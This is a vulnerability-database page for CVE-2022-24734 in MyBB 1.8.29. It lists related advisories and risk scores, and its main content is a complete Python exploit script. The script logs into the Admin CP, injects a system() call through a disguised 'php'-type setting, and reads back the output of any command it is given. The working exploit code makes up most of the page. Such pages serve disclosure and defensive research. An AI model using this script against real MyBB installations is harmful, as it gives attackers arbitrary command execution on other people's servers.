Vulners
Lucene search
MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (Authenticated) Exploit | 12 May 202200:00 | – | zdt |
| MyBB (prior 1.8.30) Admin Control Remote Code Execution Exploit | 31 May 202200:00 | – | zdt |
 | Exploit for Code Injection in Mybb | 8 May 202215:20 | – | githubexploit |
| Exploit for Code Injection in Mybb | 15 May 202219:18 | – | githubexploit |
 | CVE-2022-24734 | 10 Mar 202200:12 | – | circl |
 | MyBB 代码注入漏洞 | 9 Mar 202200:00 | – | cnnvd |
 | MyBB Remote Code Execution Vulnerability (CNVD-2022-20097) | 11 Mar 202200:00 | – | cnvd |
 | MyBB Admin Control Panel Remote Code Execution (CVE-2022-24734) | 20 Apr 202200:00 | – | checkpoint_advisories |
 | CVE-2022-24734 | 9 Mar 202221:25 | – | cve |
 | CVE-2022-24734 Remote code execution in mybb | 9 Mar 202221:25 | – | cvelist |
10
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
def login(username, password):
data = {
"username" : username,
"password" : password,
"do" : "login"
}
login_txt = r_client.post(host + "/admin/index.php", data=data).text
if "The username and password combination you entered is invalid" in login_txt:
print("[-] Login failure. Incorrect credentials supplied")
exit(0)
print("[+] Login successful!")
def add_settings(cmd, raw_cmd=""):
config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text
if "Access Denied" in config_settings_txt:
print("[-] Supplied user doesn't have the rights to add a setting")
exit(0)
print("[*] Adding a malicious settings...")
soup = BeautifulSoup(config_settings_txt, "lxml")
my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
rand_string = get_rand_string()
if raw_cmd != "":
extra = "\" . system('{}') .\"".format(raw_cmd)
else:
extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)
data = {
"my_post_key" : my_post_key,
"title" : "An innocent setting",
"description" : "An innocent description",
"gid" : 1,
"disporder" : "",
"name" : rand_string,
"type" : "\tphp",
"extra" : extra,
"value" : "An innocent value"
}
post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)
if post_setting.status_code != 302:
soup = BeautifulSoup(post_setting.text, "lxml")
error_txt = soup.find_all("div", {"class" : "error"})[0].text
print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
exit(0)
print("[+] Malicious post settings accepted!")
return rand_string
def get_rand_string(length=20):
return ''.join(random.choice(string.ascii_letters) for i in range(length))
def get_cmd_result(ident_string, raw_cmd=""):
conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
soup = BeautifulSoup(conf_settings_list, "lxml")
row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]
cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text
if raw_cmd == "":
cmd_result = b64decode(cmd_result[2:]).decode()
print("[+] Result: {}".format(str(cmd_result)))
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()
username = args.username
password = args.password
host = args.host
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd
r_client = requests.Session()
login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2022 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 26.5
CVSS 3.17.2
EPSS0.82413
SSVC